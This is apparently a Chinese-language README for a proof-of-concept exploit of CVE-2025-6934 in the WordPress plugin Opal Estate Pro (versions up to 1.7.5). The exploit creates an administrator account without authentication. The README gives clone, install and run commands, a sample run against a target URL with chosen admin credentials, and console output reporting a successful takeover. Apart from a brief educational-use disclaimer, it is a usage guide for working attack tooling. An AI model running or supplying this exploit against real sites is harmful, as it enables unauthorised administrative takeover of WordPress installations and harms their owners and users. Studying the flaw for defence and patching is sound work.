CVE-2025-6934 是一个概念验证(PoC)漏洞利用程序,针对 WordPress 插件:Opal Estate Pro ≤ 1.7.5。
该利用程序演示了无需身份验证即可创建管理员账户。
免责声明: 此 PoC 仅供教育目的使用。未经许可,请勿在系统上使用。
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
依赖项:
requests、beautifulsoup4、colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | 描述 | 必填 | 默认值 |
|---|---|---|---|
-u, --url | 目标站点 URL | 是 | - |
-mail, --newmail | 新管理员邮箱 | 是 | - |
-password, --newpassword | 新管理员密码 | 是 | - |
-user, --username | 新管理员用户名 | 否 | administrator |
控制台显示:
[•][✔][✖][i]示例:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
我是一名活跃的开发者,喜欢构建工具并分享知识。你可以通过以下方式联系我: